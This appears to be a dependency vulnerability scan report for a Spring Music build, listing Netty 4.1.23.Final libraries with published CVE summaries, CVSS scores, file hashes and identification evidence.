Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-41915 for details CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec:4.1.23.Final:*:*:*:*:*:*:*
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which missed fixing this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21290 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2025-25193
Netty, an asynchronous, event-driven network application framework, has a vulnerability in versions up to and including 4.1.118.Final. An unsafe reading of an environment file could potentially cause a denial of service in Netty. When loaded in a Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crashes. A similar issue was previously reported as CVE-2024-47535. This issue was fixed, but the fix was incomplete in that null bytes were not counted against the input limit. Commit d1fbda62d3a47835d3fb35db8bd42ecc205a5386 contains an updated fix.
CWE-400 Uncontrolled Resource Consumption
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: netty-common-4.1.23.Final.jar (shaded: org.jctools:jctools-core:2.1.1)
Description: Java Concurrency Tools Core Library
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-common-4.1.23.Final.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: d532029de01ef1c790266dea91b1ecdc
SHA1: f9571c65e428d21c795a34de2b217419dfc0e2f7
SHA256: db8f1cd5b23d38e3dcf7020d739e1c2f9559489051291d8a07095e62b8d7f750
Evidence Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | jctools-core | Low
Vendor | pom | groupid | org.jctools | Highest
Vendor | pom | name | Java Concurrency Tools Core Library | High
Vendor | pom | url | JCTools | Highest
Product | pom | artifactid | jctools-core | Highest
Product | pom | groupid | org.jctools | Highest
Product | pom | name | Java Concurrency Tools Core Library | High
Product | pom | url | JCTools | High
Version | pom | version | 2.1.1 | Highest
spring-music-sqldb-1.0.jar: netty-common-4.1.23.Final.jar
Description: Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.
License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-common-4.1.23.Final.jar
MD5: f00e1c8f82841ba33bcd7bd84f633f40
SHA1: 387b1b9d0441646a5cf84eace2b3e15dd07aca47
SHA256: 6ae4700a4571c11220ddab53492fd8eb806c1f8588e46ce12c5ae8668e4a858f
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | netty-common | High
Vendor | jar | package name | io | Highest
Vendor | jar | package name | netty | Highest
Vendor | Manifest | automatic-module-name | io.netty.common | Medium
Vendor | Manifest | bundle-docurl | http://netty.io/ | Low
Vendor | Manifest | bundle-symbolicname | io.netty.common | Medium
Vendor | Manifest | implementation-url | http://netty.io/netty-common/ | Low
Vendor | Manifest | Implementation-Vendor | The Netty Project | High
Vendor | Manifest | Implementation-Vendor-Id | io.netty | Medium
Vendor | pom | artifactid | netty-common | Low
Vendor | pom | groupid | io.netty | Highest
Vendor | pom | name | Netty/Common | High
Vendor | pom | parent-artifactid | netty-parent | Low
Product | file | name | netty-common | High
Product | jar | package name | io | Highest
Product | jar | package name | netty | Highest
Product | Manifest | automatic-module-name | io.netty.common | Medium
Product | Manifest | bundle-docurl | http://netty.io/ | Low
Product | Manifest | Bundle-Name | Netty/Common | Medium
Product | Manifest | bundle-symbolicname | io.netty.common | Medium
Product | Manifest | Implementation-Title | Netty/Common | High
Product | Manifest | implementation-url | http://netty.io/netty-common/ | Low
Product | pom | artifactid | netty-common | Highest
Product | pom | groupid | io.netty | Highest
Product | pom | name | Netty/Common | High
Product | pom | parent-artifactid | netty-parent | Medium
Version | Manifest | Bundle-Version | 4.1.23.Final | High
Version | Manifest | Implementation-Version | 4.1.23.Final | High
Version | pom | version | 4.1.23.Final | Highest
CVE-2019-20444
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold."
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2019-20445
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2019-16869
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2020-11612
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
OSSINDEX - [CVE-2020-11612] CWE-789: Uncontrolled Memory Allocation
OSSIndex - https://github.com/netty/netty/issues/9924
Vulnerable Software & Versions:
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack.
CWE-400 Uncontrolled Resource Consumption
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it also may buffer reserved skippable chunks until the whole chunk has been received, which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.
CWE-400 Uncontrolled Resource Consumption
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder.
CWE-674 Uncontrolled Recursion
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-44487
CISA Known Exploited Vulnerability:
Product: IETF HTTP/2
Name: HTTP/2 Rapid Reset Attack Vulnerability
Date Added: 2023-10-10
Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS).
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Due Date: 2023-10-31
Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2024-47535 (OSSINDEX)
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. An unsafe reading of an environment file could potentially cause a denial of service in Netty. When loaded in a Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crashes. This vulnerability is fixed in 4.1.115.
CWE-400 Uncontrolled Resource Consumption
CVSSv2: Base Score: MEDIUM (6.8) Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-common:4.1.23.Final:*:*:*:*:*:*:*
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast, as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause Netty to "sanitize" header names before it forwards these to another remote system when used as a proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
Vulnerable Software & Versions:
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this purpose it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet, but there are no checks done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: LOW (2.6)
Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a follow-up of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, which missed this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on the disk is enabled. On Unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern macOS operating systems. The method "File.createTempFile" on Unix-like systems creates a random file, but by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify their own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
CVSSv2:
Base Score: LOW (1.9)
Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
References:
OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21290
OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
CVSSv2:
Base Score: LOW (1.9)
Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
Vulnerable Software & Versions:
CVE-2025-25193
Netty, an asynchronous, event-driven network application framework, has a vulnerability in versions up to and including 4.1.118.Final. An unsafe reading of an environment file could potentially cause a denial of service in Netty. When loaded in a Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crashes. A similar issue was previously reported as CVE-2024-47535. This issue was fixed, but the fix was incomplete in that null bytes were not counted against the input limit. Commit d1fbda62d3a47835d3fb35db8bd42ecc205a5386 contains an updated fix. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: MEDIUM (5.5)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: netty-transport-4.1.23.Final.jar
Description: Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.
License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-transport-4.1.23.Final.jar
MD5: b526820b1d947bfd1a0155cf97cae3de
SHA1: 80dfcc723083e23058878ddbc33f5fb0ce9ec9e9
SHA256: 93ca3532c7906f7331260ba34f879bb2da933ff855cccda7eda61caced54346f
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | netty-transport | High
Vendor | jar | package name | io | Highest
Vendor | jar | package name | netty | Highest
Vendor | Manifest | automatic-module-name | io.netty.transport | Medium
Vendor | Manifest | bundle-docurl | http://netty.io/ | Low
Vendor | Manifest | bundle-symbolicname | io.netty.transport | Medium
Vendor | Manifest | implementation-url | http://netty.io/netty-transport/ | Low
Vendor | Manifest | Implementation-Vendor | The Netty Project | High
Vendor | Manifest | Implementation-Vendor-Id | io.netty | Medium
Vendor | pom | artifactid | netty-transport | Low
Vendor | pom | groupid | io.netty | Highest
Vendor | pom | name | Netty/Transport | High
Vendor | pom | parent-artifactid | netty-parent | Low
Product | file | name | netty-transport | High
Product | jar | package name | io | Highest
Product | jar | package name | netty | Highest
Product | Manifest | automatic-module-name | io.netty.transport | Medium
Product | Manifest | bundle-docurl | http://netty.io/ | Low
Product | Manifest | Bundle-Name | Netty/Transport | Medium
Product | Manifest | bundle-symbolicname | io.netty.transport | Medium
Product | Manifest | Implementation-Title | Netty/Transport | High
Product | Manifest | implementation-url | http://netty.io/netty-transport/ | Low
Product | pom | artifactid | netty-transport | Highest
Product | pom | groupid | io.netty | Highest
Product | pom | name | Netty/Transport | High
Product | pom | parent-artifactid | netty-parent | Medium
Version | Manifest | Bundle-Version | 4.1.23.Final | High
Version | Manifest | Implementation-Version | 4.1.23.Final | High
Version | pom | version | 4.1.23.Final | Highest
Related Dependencies
spring-music-sqldb-1.0.jar: netty-buffer-4.1.23.Final.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-buffer-4.1.23.Final.jar
MD5: 734215aaca6fb8826a972a6838bbc51d
SHA1: 0c6c0705bbd5d68aebc2d5fdd48e9dda8a8ad6d3
SHA256: db3e3f80069d5877ca6cc5525dce68d7399f4fe060bea6ee0b0a397f3a728973
pkg:maven/io.netty/netty-buffer@4.1.23.Final
spring-music-sqldb-1.0.jar: netty-handler-4.1.23.Final.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-handler-4.1.23.Final.jar
MD5: 1c8913130cfae6ae25712e0bdb6f630c
SHA1: a6314d244dd11db14249dc2d492e8dd3eec4cdb1
SHA256: 9aaea84da111fbb659b58a90074f670c7b2bb959802d5795ce2407588781fd2d
pkg:maven/io.netty/netty-handler@4.1.23.Final
spring-music-sqldb-1.0.jar: netty-resolver-4.1.23.Final.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-resolver-4.1.23.Final.jar
